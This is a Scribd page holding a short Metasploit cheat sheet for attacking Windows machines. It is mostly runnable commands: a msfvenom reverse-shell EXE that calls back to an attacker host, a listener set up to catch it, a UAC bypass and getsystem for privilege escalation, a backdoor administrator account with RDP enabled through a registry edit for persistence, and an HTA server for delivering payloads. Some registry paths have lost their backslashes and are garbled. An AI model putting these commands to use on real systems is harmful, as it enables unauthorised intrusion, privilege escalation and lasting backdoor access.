Scribd
Upload
173 views2 pages

MSF Venom

This document outlines steps to generate a Metasploit payload, set up a handler, escalate privileges on a Windows system, establish persistence, and serve a payload through a HTA server. It includes using msfvenom to generate an EXE payload, running msfconsole to handle the payload, using an exploit to gain administrator access, adding a new user and enabling RDP for persistence, and running an HTA server through Metasploit to serve a payload to targets.

Uploaded by

Srinivas Naidu T S
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
173 views2 pages

MSF Venom

This document outlines steps to generate a Metasploit payload, set up a handler, escalate privileges on a Windows system, establish persistence, and serve a payload through a HTA server. It includes using msfvenom to generate an EXE payload, running msfconsole to handle the payload, using an exploit to gain administrator access, adding a new user and enabling RDP for persistence, and running an HTA server through Metasploit to serve a payload to targets.

Uploaded by

Srinivas Naidu T S
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 2

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe

LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

sudo apt-get install shellter

msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp

run or exploit

cp something32.exe /var/www/html

service apache2 start

privilege escalation:

background

use exploit/windows/local/bypassuac_comhijack

set SESSION 2

set payload windows/x64/meterpreter/reverse_tcp

run or exploit

getsystem

persistence:

shell

C:WINDOWS\system32

net user /add jaime Bru73f0rc3_

net localgroup administrators jaime /add

net localgroup “Remote Desktop Users” jaime /add

reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server”


/v fDenyTSConnections /t REG_DWORD /d 0 /f
nmap -sV -O IP or nmap -p- IP

msfconsole
use windows/misc/hta_server
show options
set SRVHOST
set URIPATH
set target
exploit or run
sessions
sessions -i 1
help or shell

You might also like